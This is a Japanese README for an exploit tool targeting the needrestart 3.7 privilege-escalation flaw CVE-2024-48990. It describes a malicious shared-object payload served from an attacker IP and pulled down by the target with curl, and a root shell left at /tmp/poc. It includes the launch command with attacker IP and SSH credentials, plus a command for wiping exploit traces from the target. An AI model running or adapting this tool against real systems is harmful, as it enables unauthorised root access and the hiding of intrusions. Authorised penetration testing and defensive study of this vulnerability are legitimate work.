
このツールは、needrestart バージョン 3.7 における権限昇格の脆弱性(CVE-2024-48990)の悪用を自動化します。
needrestart が Python プロセスをスキャンする際の PYTHONPATH 環境変数の安全でない使用を悪用して、root での実行を実現します。
このエクスプロイトは以下の手順で動作します:
__init__.so)をコンパイルする。.so を配信する。PYTHONPATH 環境を準備する。importlib を継続的にインポートする Python ベイトプロセスを起動する。needrestart を実行する。これにより改ざんされた PYTHONPATH が継承され、悪意のあるモジュールが読み込まれ、ペイロードが root として実行される。/tmp/poc)を作成し、root シェルへのアクセスを可能にする。攻撃者マシンからエクスプロイトを実行します:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
パラメータ:
needrestart バージョン 3.7ターゲットからエクスプロイトの痕跡を削除するには:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect (pip3 install pexpect)gcc(ペイロードのコンパイル用)python3 -m http.server(スクリプトによって自動起動される)needrestart(v3.7)/usr/sbin/needrestart に対する sudo NOPASSWD 権限を持つ非 root ユーザーcurl がインストールされていることこのツールは、教育目的および許可を得たセキュリティテスト専用に提供されています。 所有していないシステムや明示的な許可がないシステムで使用しないでください。